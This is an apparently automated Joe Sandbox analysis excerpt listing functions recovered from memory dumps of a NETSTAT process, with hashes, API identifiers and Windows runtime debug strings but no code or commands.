                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: a72e106f94263303c3b42572f1ad02e1f07d26af0b80d7a67bbfa83ea1f63550
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: DB021775518381AFD305CF68C890A6BBBE9EFC8740F08892DF9855B265DB31E905CB52
                                                      Function 0393B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 0466fad1c4cde100c0001cf5744769daee17a83935582127fd5cc290bd8c62f8
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 2481FFF0E412499EDF24DE68C8917FEBBBAEF463A0F1C455AD862A7791C7308840CB51
                                                      Function 039A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                      • Instruction ID: 8fe78f0c0fbaa791971238ea3408704cb6db34c01a9e721ca8faae3584fe6bb7
                                                      • Opcode Fuzzy Hash: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                      • Instruction Fuzzy Hash: 7821517AE00619ABCB10DF69CC40AEFB7ECEF44684F080626E955E7200E734D9018BE1
                                                      Function 0391F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 0396031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                      • Instruction ID: 69948268721b64360fe9c2537abebb7dbe172a5968dbf9c812f78cf5ceffcc6c
                                                      • Opcode Fuzzy Hash: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                      • Instruction Fuzzy Hash: 9BE1DC716087499FD725DF28C884B2AB7E8BF84364F180A6DF4A69B3E0D774D854CB42
                                                      Function 0392BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 03967BAC
                                                      • RTL: Resource at %p, xrefs: 03967B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                      • Instruction ID: 9a86efa35f7d8a6b1d9f4ea71a919f66acf0f971e1f58efc6c2895e79c13591f
                                                      • Opcode Fuzzy Hash: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                      • Instruction Fuzzy Hash: C5410435305B029FD724DE65CC40B6ABBE9EF88720F040A1DF95AEB680DB31E405CB91
                                                      Function 0392B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 039672C1
                                                      • RTL: Resource at %p, xrefs: 039672A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                      • Instruction ID: 053090d102bb98028789e08b7715854f6f5641fb9b8c4f4a6ded4627d216b525
                                                      • Opcode Fuzzy Hash: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                      • Instruction Fuzzy Hash: 3141EE36701716ABD720DE65CC81F6ABBE9FB84754F140A19F856EB280DB31F8428BD1
                                                      Function 039A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                      • Instruction ID: ac3f5e5f32f72dafce18efb802809cd3a4c9574746768b8aecceb99705712495
                                                      • Opcode Fuzzy Hash: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                      • Instruction Fuzzy Hash: 4B314676A006299FCB20DF2DDC40BEEB7FCEF45654F454995E889E7240EF309A458BA0
                                                      Function 03937D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 43403293434a17c0819d5470c098a2e89f7b82bb65c0ab6ba4026980d3be3f2b
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: AC9194F5E0021A9BDF24DFA9C8816FEB7B9FF467A0F18451AE865E72D0D73099408B50
                                                      Function 038F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                      • Instruction ID: 62410d381c727ea0943dc8e70ffa2ce102f8e41d8851e62ddde045b96e27b878
                                                      • Opcode Fuzzy Hash: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                                                      • Instruction Fuzzy Hash: 8E813C75D012699FDB21DF94CC44BEAB7B8AB48750F0445EAEA19BB280D7305E84CFA0
                                                      Function 0397CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0397CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: e23c2f23023aba78fb209760d1b207ab4b3f6de1f13ecfdbb4367effd97a171a
                                                      • Instruction ID: 2bb6430180626d37b345c92cd326fd828e1eeb181cda5a6d0d467dea40c0fad4
                                                      • Opcode Fuzzy Hash: e23c2f23023aba78fb209760d1b207ab4b3f6de1f13ecfdbb4367effd97a171a
                                                      • Instruction Fuzzy Hash: B2418F75900318DFCB22DFA9C880A6EBBB8EF85B00F04442AE955DF294D734D941CB61
                                                      Function 03713A48 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -g+&$8/$E:sx$sx;C
                                                      • API String ID: 0-509217568
                                                      • Opcode ID: ccc60aec9926210af01a7e2931172de49113e51b292052185b0367fd795cdf98
                                                      • Instruction ID: e106e28c9e7f821af71139cb69ef331bb4e07ab0f61ffde718b15002c79228d1
                                                      • Opcode Fuzzy Hash: ccc60aec9926210af01a7e2931172de49113e51b292052185b0367fd795cdf98
                                                      • Instruction Fuzzy Hash: F2F0A034128BC446D708AB14C84429ABBD1FBC8308F900B5CF8CAEA291DA79C205C74B